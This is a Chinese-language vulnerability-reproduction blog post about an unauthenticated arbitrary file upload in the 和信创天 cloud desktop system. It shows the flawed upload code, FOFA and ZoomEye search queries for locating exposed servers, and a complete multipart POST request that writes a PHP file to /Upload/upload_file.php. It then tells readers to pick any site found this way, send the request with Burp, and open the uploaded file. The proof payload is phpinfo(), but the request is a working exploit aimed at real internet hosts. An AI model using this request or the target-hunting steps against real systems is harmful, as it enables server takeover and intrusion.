和信创天云桌面系统VENGD文件上传漏洞复现
1.漏洞概述
和信创天下一代云桌面系统融合了VDI、VOI、IDV三大架构优势的云桌面产品,实现了前后端混合计算,兼顾移动办公和窄带环境下3D高清播放和外设硬件全兼容,满足大规模终端的管理、安全、运维需求。
2021HW期间,爆出和信创天下一代云桌面爆出文件上传漏洞,攻击者可利用该漏洞写入php恶意代码,从而控制服务器。
2.漏洞分析
漏洞存在/Upload/upload_file.php文件中,由于没有做任何过滤,直接上传。漏洞代码:
$target_path=$_SERVER["DOCUMENT_ROOT"]."/Upload/".$l."/".$_FILES["file"]["name"];
3.影响版本
未知(20210408之前版本)
4.漏洞等级
高危
5.漏洞复现
5.1 FOFA实战复现
关键词:
body="和信下一代云桌面"
zoomEy:title:和信下一代云桌面
POST Payload:
POST /Upload/upload_file.php?l=test HTTP/1.1
Host: X.X.X.X
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv
------WebKitFormBoundaryfcKRltGv
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/avif
<?php
phpinfo();
?>
------WebKitFormBoundaryfcKRltGv--
直接fofa找一波
、
随便找一个站burp post一下
打开url xxx/upload/test/phpinfo.php
注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
和信创天云桌面系统VENGD文件上传漏洞复现相关推荐
- 【漏洞复现】和信创天云桌面系统—任意文件上传
简介 和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计 ...
- 和信创天云桌面系统远程命令执行 RCE漏洞复现渗透测试
前言 和信创天云桌面系统,官方介绍,市场上主要有华为.深信服.锐捷.和信创天四大云桌面厂商,华为从网络设备的角度打造整体解决方案,深信服从安全的角度切入云桌面,锐捷主打针对教育行业的云课堂业务,但前三 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)
前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...
- 和信创天云桌面系统远程命令执行
若天下不定,吾往:若世道不平,不回! 漏洞描述 和信创天云桌面系统存在默认配置导致文件上传并可以远程命令执行 漏洞影响 和信创天云桌面系统 漏洞复现 构造payload POST /Upload/u ...
- Goby 漏洞更新 |海康威视部分iVMS系统存在文件上传漏洞
漏洞名称:海康威视部分iVMS系统存在文件上传漏洞 English Name:Some Hikvision iVMS file upload vulnerabilitie CVSS core: 9.8 ...
- php kindeditor 文件不存在_不能取得文件类型!,kindeditor=4.1.5文件上传漏洞复现
原标题:kindeditor<=4.1.5文件上传漏洞复现 0x00:背景 KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE.Fire ...
- UEditor .Net版本任意文件上传漏洞复现总结
UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近 ...
最新文章
- 负载均衡技术中的真集群和伪集群
- iOS ASIHttpRequest 封装
- source insight(SI)怎么显示全路径?(不显示省略路径)(关闭Trim long path names with ellipses)
- 消息推送与同步协议的思考
- Java: 使用proxy连接URL
- 马斯克:特斯拉取消Model S Plaid+生产 Plaid版性能已非常好
- edge打开pdf不显示印章_SumatraPDF - 免费轻量的 PDF 阅读器
- handler和thread之间如何传输数据_HTTP和TCP之间的关系
- 容器技术Docker K8s 52 边缘容器服务(ACK@Edge)-边缘计算和边缘容器
- [转载] 在 CentOS 7 中安装 MySQL 8
- Amazon Alexa Smart Home Skill 增加订阅事件
- http://wang-min-zhao-sina-com.iteye.com/blog/1467204
- 【Java】29.常用API之lang.Throwable(异常情况大总结)
- C++实现CS模型(计算机网络)
- android制作类似支付圆圈和打钩界面ProgressWheel
- Vue3二维码生成(简洁明了)
- 软件测试——三角形问题测试用例练习
- MySQL百万级压测数据表
- 什么是算法?数据结构与算法概念
- JavaScript 原型和原型链